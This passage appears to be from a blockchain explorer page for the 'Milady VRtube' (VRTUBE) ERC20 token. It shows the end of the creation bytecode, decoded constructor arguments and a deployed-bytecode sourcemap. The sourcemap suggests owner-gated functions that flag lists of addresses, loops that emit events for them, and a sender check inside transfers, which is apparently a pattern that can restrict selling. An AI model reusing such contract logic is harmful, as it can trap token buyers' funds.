9a6565b5b6000611c44848285016119f9565b91505092915050565b60008060008060608587031215611c6757611c666119a6565b5b600085013567ffffffffffffffff811115611c8557611c846119ab565b5b611c9187828801611b7d565b94509450506020611ca487828801611a2f565b9250506040611cb587828801611a2f565b91505092959194509250565b611cca816119d0565b82525050565b6000602082019050611ce56000830184611cc1565b92915050565b600080600060408486031215611d0457611d036119a6565b5b600084013567ffffffffffffffff811115611d2257611d216119ab565b5b611d2e86828701611b7d565b93509350506020611d4186828701611a2f565b9150509250925092565b60008060408385031215611d6257611d616119a6565b5b6000611d70858286016119f9565b9250506020611d81858286016119f9565b9150509250929050565b611d9481611a84565b8114611d9f57600080fd5b50565b600081359050611db181611d8b565b92915050565b600060208284031215611dcd57611dcc6119a6565b5b6000611ddb84828501611da2565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611e2b57607f821691505b602082108103611e3e57611e3d611de4565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e7a6020836118ff565b9150611e8582611e44565b602082019050919050565b60006020820190508181036000830152611ea981611e6d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f1982611a0e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611f4b57611f4a611edf565b5b600182019050919050565b6000611f6182611a0e565b9150611f6c83611a0e565b9250828201905080821115611f8457611f83611edf565b5b92915050565b6000819050919050565b6000819050919050565b6000611fb9611fb4611faf84611f8a565b611f94565b611a0e565b9050919050565b611fc981611f9e565b82525050565b6000608082019050611fe46000830187611fc0565b611ff16020830186611aba565b611ffe6040830185611aba565b61200b6060830184611fc0565b95945050505050565b60006080820190506120296000830187611aba565b6120366020830186611fc0565b6120436040830185611fc0565b6120506060830184611aba565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006120b56025836118ff565b91506120c082612059565b604082019050919050565b600060208201905081810360008301526120e4816120a8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006121476026836118ff565b9150612152826120eb565b604082019050919050565b600060208201905081810360008301526121768161213a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006121d96024836118ff565b91506121e48261217d565b604082019050919050565b60006020820190508181036000830152612208816121cc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061226b6022836118ff565b91506122768261220f565b604082019050919050565b6000602082019050818103600083015261229a8161225e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006122d7601d836118ff565b91506122e2826122a1565b602082019050919050565b60006020820190508181036000830152612306816122ca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006123696025836118ff565b91506123748261230d565b604082019050919050565b600060208201905081810360008301526123988161235c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006123fb6023836118ff565b91506124068261239f565b604082019050919050565b6000602082019050818103600083015261242a816123ee565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061248d6026836118ff565b915061249882612431565b604082019050919050565b600060208201905081810360008301526124bc81612480565b9050919050565b50565b60006124d36000836118ff565b91506124de826124c3565b600082019050919050565b60006020820190508181036000830152612502816124c6565b905091905056fea2646970667358221220e29fb923b659f5b70434b4e39a765a5e0a620980ce096b55bdc58caecb5d40b464736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000002540be400000000000000000000000000000000000000000000000000000000000000000d4d696c616479205652747562650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065652545542450000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Milady VRtube
Arg [1] : symbol_ (string): VRTUBE
Arg [2] : amount (uint256): 10000000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 00000000000000000000000000000000000000000000000000000002540be400
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [4] : 4d696c6164792056527475626500000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 5652545542450000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

8075:12615:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8804:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13100:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11869:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13881:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9766:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9866:440;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14585:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11271:268;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8581:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12040:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6062:103;;;:::i;:::-;;10844:292;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11547:100;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5421:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9023:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10314:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10545:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15326:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12373:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11144:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12629:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6320:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11653:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8804:100;8858:13;8891:5;8884:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8804:100;:::o;13100:201::-;13183:4;13200:13;13216:12;:10;:12::i;:::-;13200:28;;13239:32;13248:5;13255:7;13264:6;13239:8;:32::i;:::-;13289:4;13282:11;;;13100:201;;;;:::o;11869:108::-;11930:7;11957:12;;11950:19;;11869:108;:::o;13881:295::-;14012:4;14029:15;14047:12;:10;:12::i;:::-;14029:30;;14070:38;14086:4;14092:7;14101:6;14070:15;:38::i;:::-;14119:27;14129:4;14135:2;14139:6;14119:9;:27::i;:::-;14164:4;14157:11;;;13881:295;;;;;:::o;9766:92::-;9824:5;9849:1;9842:8;;9766:92;:::o;9866:440::-;9956:12;:10;:12::i;:::-;9945:23;;:7;:5;:7::i;:::-;:23;;;:94;;;;10027:12;:10;:12::i;:::-;9972:67;;9980:42;9972:67;;;9945:94;:117;;;;10050:12;:10;:12::i;:::-;10043:19;;:3;;;;;;;;;;;:19;;;9945:117;9937:163;;;;;;;;;;;;:::i;:::-;;;;;;;;;10116:9;10111:188;10135:11;;:18;;10131:1;:22;10111:188;;;10197:4;10175:3;:19;10179:11;;10191:1;10179:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10175:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;10254:4;10221:66;;10230:11;;10242:1;10230:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10221:66;;;10261:25;10271:11;;10283:1;10271:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10261:9;:25::i;:::-;10221:66;;;;;;:::i;:::-;;;;;;;;10155:3;;;;;:::i;:::-;;;;10111:188;;;;9866:440;;:::o;14585:238::-;14673:4;14690:13;14706:12;:10;:12::i;:::-;14690:28;;14729:64;14738:5;14745:7;14782:10;14754:25;14764:5;14771:7;14754:9;:25::i;:::-;:38;;;;:::i;:::-;14729:8;:64::i;:::-;14811:4;14804:11;;;14585:238;;;;:::o;11271:268::-;11368:12;:10;:12::i;:::-;11361:19;;:3;;;;;;;;;;;:19;;;11352:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;11434:9;11429:103;11453:11;;:18;;11449:1;:22;11429:103;;;11515:5;11493:3;:19;11497:11;;11509:1;11497:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;11493:19;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;11473:3;;;;;:::i;:::-;;;;11429:103;;;;11271:268;;:::o;8581:153::-;8650:12;:10;:12::i;:::-;8643:19;;:3;;;;;;;;;;;:19;;;8634:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;8719:7;8711:5;;:15;;;;;;;;;;;;;;;;;;8581:153;:::o;12040:127::-;12114:7;12141:9;:18;12151:7;12141:18;;;;;;;;;;;;;;;;12134:25;;12040:127;;;:::o;6062:103::-;5307:13;:11;:13::i;:::-;6127:30:::1;6154:1;6127:18;:30::i;:::-;6062:103::o:0;10844:292::-;10948:9;10943:186;10967:11;;:18;;10963:1;:22;10943:186;;;11046:11;;11058:1;11046:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;11012:49;;11017:10;;;;;;;;;;;11012:49;;;11029:1;11032:3;11037:4;11043:1;11012:49;;;;;;;;;:::i;:::-;;;;;;;;11106:5;;;;;;;;;;;11081:36;;11090:11;;11102:1;11090:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;11081:36;;;11113:3;11081:36;;;;;;:::i;:::-;;;;;;;;10987:3;;;;;:::i;:::-;;;;10943:186;;;;10844:292;;;;:::o;11547:100::-;11601:4;11625:3;:14;11629:9;11625:14;;;;;;;;;;;;;;;;;;;;;;;;;11618:21;;11547:100;;;:::o;5421:87::-;5467:7;5494:6;;;;;;;;;;;5487:13;;5421:87;:::o;9023:104::-;9079:13;9112:7;9105:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9023:104;:::o;10314:225::-;10408:9;10403:129;10427:11;;:18;;10423:1;:22;10403:129;;;10505:4;10472:48;;10481:11;;10493:1;10481:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10472:48;;;10512:7;10472:48;;;;;;:::i;:::-;;;;;;;;10447:3;;;;;:::i;:::-;;;;10403:129;;;;10314:225;;;:::o;10545:291::-;10647:9;10642:187;10666:11;;:18;;10662:1;:22;10642:187;;;10745:11;;10757:1;10745:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10711:49;;10716:10;;;;;;;;;;;10711:49;;;10728:3;10733:1;10736;10739:4;10711:49;;;;;;;;;:::i;:::-;;;;;;;;10796:11;;10808:1;10796:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10780:37;;10789:5;;;;;;;;;;;10780:37;;;10812:4;10780:37;;;;;;:::i;:::-;;;;;;;;10686:3;;;;;:::i;:::-;;;;10642:187;;;;10545:291;;;;:::o;15326:436::-;15419:4;15436:13;15452:12;:10;:12::i;:::-;15436:28;;15475:24;15502:25;15512:5;15519:7;15502:9;:25::i;:::-;15475:52;;15566:15;15546:16;:35;;15538:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;15659:60;15668:5;15675:7;15703:15;15684:16;:34;15659:8;:60::i;:::-;15750:4;15743:11;;;;15326:436;;;;:::o;12373:193::-;12452:4;12469:13;12485:12;:10;:12::i;:::-;12469:28;;12508;12518:5;12525:2;12529:6;12508:9;:28::i;:::-;12554:4;12547:11;;;12373:193;;;;:::o;11144:119::-;11245:3;11229:26;;11238:5;11229:26;;;11250:4;11229:26;;;;;;:::i;:::-;;;;;;;;11144:119;;;:::o;12629:151::-;12718:7;12745:11;:18;12757:5;12745:18;;;;;;;;;;;;;;;:27;12764:7;12745:27;;;;;;;;;;;;;;;;12738:34;;12629:151;;;;:::o;6320:201::-;5307:13;:11;:13::i;:::-;6429:1:::1;6409:22;;:8;:22;;::::0;6401:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6485:28;6504:8;6485:18;:28::i;:::-;6320:201:::0;:::o;11653:153::-;11717:12;:10;:12::i;:::-;11710:19;;:3;;;;;;;;;;;:19;;;11701:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;11797:1;11778:16;;:20;;;;;;;;;;;;;;;;;;11653:153;:::o;4130:98::-;4183:7;4210:10;4203:17;;4130:98;:::o;18325:380::-;18478:1;18461:19;;:5;:19;;;18453:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18559:1;18540:21;;:7;:21;;;18532:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18643:6;18613:11;:18;18625:5;18613:18;;;;;;;;;;;;;;;:27;18632:7;18613:27;;;;;;;;;;;;;;;:36;;;;18681:7;18665:32;;18674:5;18665:32;;;18690:6;18665:32;;;;;;:::i;:::-;;;;;;;;18325:380;;;:::o;18996:453::-;19131:24;19158:25;19168:5;19175:7;19158:9;:25::i;:::-;19131:52;;19218:17;19198:16;:37;19194:248;;19280:6;19260:16;:26;;19252:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19364:51;19373:5;19380:7;19408:6;19389:16;:25;19364:8;:51::i;:::-;19194:248;19120:329;18996:453;;;:::o;16232:856::-;16379:1;16363:18;;:4;:18;;;16355:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16456:1;16442:16;;:2;:16;;;16434:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;16513:19;16535:9;:15;16545:4;16535:15;;;;;;;;;;;;;;;;16513:37;;16584:6;16569:11;:21;;16561:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;16701:6;16687:11;:20;16669:9;:15;16679:4;16669:15;;;;;;;;;;;;;;;:38;;;;16904:6;16887:9;:13;16897:2;16887:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;16936:3;:9;16940:4;16936:9;;;;;;;;;;;;;;;;;;;;;;;;;16932:52;;;16963:16;;;;;;;;;;;16955:24;;:4;:24;;;16947:37;;;;;;;;;;;;:::i;:::-;;;;;;;;;16932:52;17019:2;17004:26;;17013:4;17004:26;;;17023:6;17004:26;;;;;;:::i;:::-;;;;;;;;17043:37;17063:4;17069:2;17073:6;17043:19;:37::i;:::-;16344:744;16232:856;;;:::o;5586:132::-;5661:12;:10;:12::i;:::-;5650:23;;:7;:5;:7::i;:::-;:23;;;5642:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5586:132::o;6681:191::-;6755:16;6774:6;;;;;;;;;;;6755:25;;6800:8;6791:6;;:17;;;;;;;;;;;;;;;;;;6855:8;6824:40;;6845:8;6824:40;;;;;;;;;;;;6744:128;6681:191;:::o;20053:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:117::-;4962:1;4959;4952:12;4976:117;5085:1;5082;5075:12;5099:117;5208:1;5205;5198:12;5239:568;5312:8;5322:6;5372:3;5365:4;5357:6;5353:17;5349:27;5339:122;;5380:79;;:::i;:::-;5339:122;5493:6;5480:20;5470:30;;5523:18;5515:6;5512:30;5509:117;;;5545:79;;:::i;:::-;5509:117;5659:4;5651:6;5647:17;5635:29;;5713:3;5705:4;5697:6;5693:17;5683:8;5679:32;5676:41;5673:128;;;5720:79;;:::i;:::-;5673:128;5239:568;;;;;:::o;5813:559::-;5899:6;5907;5956:2;5944:9;5935:7;5931:23;5927:32;5924:119;;;5962:79;;:::i;:::-;5924:119;6110:1;6099:9;6095:17;6082:31;6140:18;6132:6;6129:30;6126:117;;;6162:79;;:::i;:::-;6126:117;6275:80;6347:7;6338:6;6327:9;6323:22;6275:80;:::i;:::-;6257:98;;;;6053:312;5813:559;;;;;:::o;6378:329::-;6437:6;6486:2;6474:9;6465:7;6461:23;6457:32;6454:119;;;6492:79;;:::i;:::-;6454:119;6612:1;6637:53;6682:7;6673:6;6662:9;6658:22;6637:53;:::i;:::-;6627:63;;6583:117;6378:329;;;;:::o;6713:849::-;6817:6;6825;6833;6841;6890:2;6878:9;6869:7;6865:23;6861:32;6858:119;;;6896:79;;:::i;:::-;6858:119;7044:1;7033:9;7029:17;7016:31;7074:18;7066:6;7063:30;7060:117;;;7096:79;;:::i;:::-;7060:117;7209:80;7281:7;7272:6;7261:9;7257:22;7209:80;:::i;:::-;7191:98;;;;6987:312;7338:2;7364:53;7409:7;7400:6;7389:9;7385:22;7364:53;:::i;:::-;7354:63;;7309:118;7466:2;7492:53;7537:7;7528:6;7517:9;7513:22;7492:53;:::i;:::-;7482:63;;7437:118;6713:849;;;;;;;:::o;7568:118::-;7655:24;7673:5;7655:24;:::i;:::-;7650:3;7643:37;7568:118;;:::o;7692:222::-;7785:4;7823:2;7812:9;7808:18;7800:26;;7836:71;7904:1;7893:9;7889:17;7880:6;7836:71;:::i;:::-;7692:222;;;;:::o;7920:704::-;8015:6;8023;8031;8080:2;8068:9;8059:7;8055:23;8051:32;8048:119;;;8086:79;;:::i;:::-;8048:119;8234:1;8223:9;8219:17;8206:31;8264:18;8256:6;8253:30;8250:117;;;8286:79;;:::i;:::-;8250:117;8399:80;8471:7;8462:6;8451:9;8447:22;8399:80;:::i;:::-;8381:98;;;;8177:312;8528:2;8554:53;8599:7;8590:6;8579:9;8575:22;8554:53;:::i;:::-;8544:63;;8499:118;7920:704;;;;;:::o;8630:474::-;8698:6;8706;8755:2;8743:9;8734:7;8730:23;8726:32;8723:119;;;8761:79;;:::i;:::-;8723:119;8881:1;8906:53;8951:7;8942:6;8931:9;8927:22;8906:53;:::i;:::-;8896:63;;8852:117;9008:2;9034:53;9079:7;9070:6;9059:9;9055:22;9034:53;:::i;:::-;9024:63;;8979:118;8630:474;;;;;:::o;9110:116::-;9180:21;9195:5;9180:21;:::i;:::-;9173:5;9170:32;9160:60;;9216:1;9213;9206:12;9160:60;9110:116;:::o;9232:133::-;9275:5;9313:6;9300:20;9291:29;;9329:30;9353:5;9329:30;:::i;:::-;9232:133;;;;:::o;9371:323::-;9427:6;9476:2;9464:9;9455:7;9451:23;9447:32;9444:119;;;9482:79;;:::i;:::-;9444:119;9602:1;9627:50;9669:7;9660:6;9649:9;9645:22;9627:50;:::i;:::-;9617:60;;9573:114;9371:323;;;;:::o;9700:180::-;9748:77;9745:1;9738:88;9845:4;9842:1;9835:15;9869:4;9866:1;9859:15;9886:320;9930:6;9967:1;9961:4;9957:12;9947:22;;10014:1;10008:4;10004:12;10035:18;10025:81;;10091:4;10083:6;10079:17;10069:27;;10025:81;10153:2;10145:6;10142:14;10122:18;10119:38;10116:84;;10172:18;;:::i;:::-;10116:84;9937:269;9886:320;;;:::o;10212:182::-;10352:34;10348:1;10340:6;10336:14;10329:58;10212:182;:::o;10400:366::-;10542:3;10563:67;10627:2;10622:3;10563:67;:::i;:::-;10556:74;;10639:93;10728:3;10639:93;:::i;:::-;10757:2;10752:3;10748:12;10741:19;;10400:366;;;:::o;10772:419::-;10938:4;10976:2;10965:9;10961:18;10953:26;;11025:9;11019:4;11015:20;11011:1;11000:9;10996:17;10989:47;11053:131;11179:4;11053:131;:::i;:::-;11045:139;;10772:419;;;:::o;11197:180::-;11245:77;11242:1;11235:88;11342:4;11339:1;11332:15;11366:4;11363:1;11356:15;11383:180;11431:77;11428:1;11421:88;11528:4;11525:1;11518:15;11552:4;11549:1;11542:15;11569:233;11608:3;11631:24;11649:5;11631:24;:::i;:::-;11622:33;;11677:66;11670:5;11667:77;11664:103;;11747:18;;:::i;:::-;11664:103;11794:1;11787:5;11783:13;11776:20;;11569:233;;;:::o;11808:191::-;11848:3;11867:20;11885:1;11867:20;:::i;:::-;11862:25;;11901:20;11919:1;11901:20;:::i;:::-;11896:25;;11944:1;11941;11937:9;11930:16;;11965:3;11962:1;11959:10;11956:36;;;11972:18;;:::i;:::-;11956:36;11808:191;;;;:::o;12005:85::-;12050:7;12079:5;12068:16;;12005:85;;;:::o;12096:60::-;12124:3;12145:5;12138:12;;12096:60;;;:::o;12162:158::-;12220:9;12253:61;12271:42;12280:32;12306:5;12280:32;:::i;:::-;12271:42;:::i;:::-;12253:61;:::i;:::-;12240:74;;12162:158;;;:::o;12326:147::-;12421:45;12460:5;12421:45;:::i;:::-;12416:3;12409:58;12326:147;;:::o;12479:585::-;12672:4;12710:3;12699:9;12695:19;12687:27;;12724:79;12800:1;12789:9;12785:17;12776:6;12724:79;:::i;:::-;12813:72;12881:2;12870:9;12866:18;12857:6;12813:72;:::i;:::-;12895;12963:2;12952:9;12948:18;12939:6;12895:72;:::i;:::-;12977:80;13053:2;13042:9;13038:18;13029:6;12977:80;:::i;:::-;12479:585;;;;;;;:::o;13070:::-;13263:4;13301:3;13290:9;13286:19;13278:27;;13315:71;13383:1;13372:9;13368:17;13359:6;13315:71;:::i;:::-;13396:80;13472:2;13461:9;13457:18;13448:6;13396:80;:::i;:::-;13486;13562:2;13551:9;13547:18;13538:6;13486:80;:::i;:::-;13576:72;13644:2;13633:9;13629:18;13620:6;13576:72;:::i;:::-;13070:585;;;;;;;:::o;13661:224::-;13801:34;13797:1;13789:6;13785:14;13778:58;13870:7;13865:2;13857:6;13853:15;13846:32;13661:224;:::o;13891:366::-;14033:3;14054:67;14118:2;14113:3;14054:67;:::i;:::-;14047:74;;14130:93;14219:3;14130:93;:::i;:::-;14248:2;14243:3;14239:12;14232:19;;13891:366;;;:::o;14263:419::-;14429:4;14467:2;14456:9;14452:18;14444:26;;14516:9;14510:4;14506:20;14502:1;14491:9;14487:17;14480:47;14544:131;14670:4;14544:131;:::i;:::-;14536:139;;14263:419;;;:::o;14688:225::-;14828:34;14824:1;14816:6;14812:14;14805:58;14897:8;14892:2;14884:6;14880:15;14873:33;14688:225;:::o;14919:366::-;15061:3;15082:67;15146:2;15141:3;15082:67;:::i;:::-;15075:74;;15158:93;15247:3;15158:93;:::i;:::-;15276:2;15271:3;15267:12;15260:19;;14919:366;;;:::o;15291:419::-;15457:4;15495:2;15484:9;15480:18;15472:26;;15544:9;15538:4;15534:20;15530:1;15519:9;15515:17;15508:47;15572:131;15698:4;15572:131;:::i;:::-;15564:139;;15291:419;;;:::o;15716:223::-;15856:34;15852:1;15844:6;15840:14;15833:58;15925:6;15920:2;15912:6;15908:15;15901:31;15716:223;:::o;15945:366::-;16087:3;16108:67;16172:2;16167:3;16108:67;:::i;:::-;16101:74;;16184:93;16273:3;16184:93;:::i;:::-;16302:2;16297:3;16293:12;16286:19;;15945:366;;;:::o;16317:419::-;16483:4;16521:2;16510:9;16506:18;16498:26;;16570:9;16564:4;16560:20;16556:1;16545:9;16541:17;16534:47;16598:131;16724:4;16598:131;:::i;:::-;16590:139;;16317:419;;;:::o;16742:221::-;16882:34;16878:1;16870:6;16866:14;16859:58;16951:4;16946:2;16938:6;16934:15;16927:29;16742:221;:::o;16969:366::-;17111:3;17132:67;17196:2;17191:3;17132:67;:::i;:::-;17125:74;;17208:93;17297:3;17208:93;:::i;:::-;17326:2;17321:3;17317:12;17310:19;;16969:366;;;:::o;17341:419::-;17507:4;17545:2;17534:9;17530:18;17522:26;;17594:9;17588:4;17584:20;17580:1;17569:9;17565:17;17558:47;17622:131;17748:4;17622:131;:::i;:::-;17614:139;;17341:419;;;:::o;17766:179::-;17906:31;17902:1;17894:6;17890:14;17883:55;17766:179;:::o;17951:366::-;18093:3;18114:67;18178:2;18173:3;18114:67;:::i;:::-;18107:74;;18190:93;18279:3;18190:93;:::i;:::-;18308:2;18303:3;18299:12;18292:19;;17951:366;;;:::o;18323:419::-;18489:4;18527:2;18516:9;18512:18;18504:26;;18576:9;18570:4;18566:20;18562:1;18551:9;18547:17;18540:47;18604:131;18730:4;18604:131;:::i;:::-;18596:139;;18323:419;;;:::o;18748:224::-;18888:34;18884:1;18876:6;18872:14;18865:58;18957:7;18952:2;18944:6;18940:15;18933:32;18748:224;:::o;18978:366::-;19120:3;19141:67;19205:2;19200:3;19141:67;:::i;:::-;19134:74;;19217:93;19306:3;19217:93;:::i;:::-;19335:2;19330:3;19326:12;19319:19;;18978:366;;;:::o;19350:419::-;19516:4;19554:2;19543:9;19539:18;19531:26;;19603:9;19597:4;19593:20;19589:1;19578:9;19574:17;19567:47;19631:131;19757:4;19631:131;:::i;:::-;19623:139;;19350:419;;;:::o;19775:222::-;19915:34;19911:1;19903:6;19899:14;19892:58;19984:5;19979:2;19971:6;19967:15;19960:30;19775:222;:::o;20003:366::-;20145:3;20166:67;20230:2;20225:3;20166:67;:::i;:::-;20159:74;;20242:93;20331:3;20242:93;:::i;:::-;20360:2;20355:3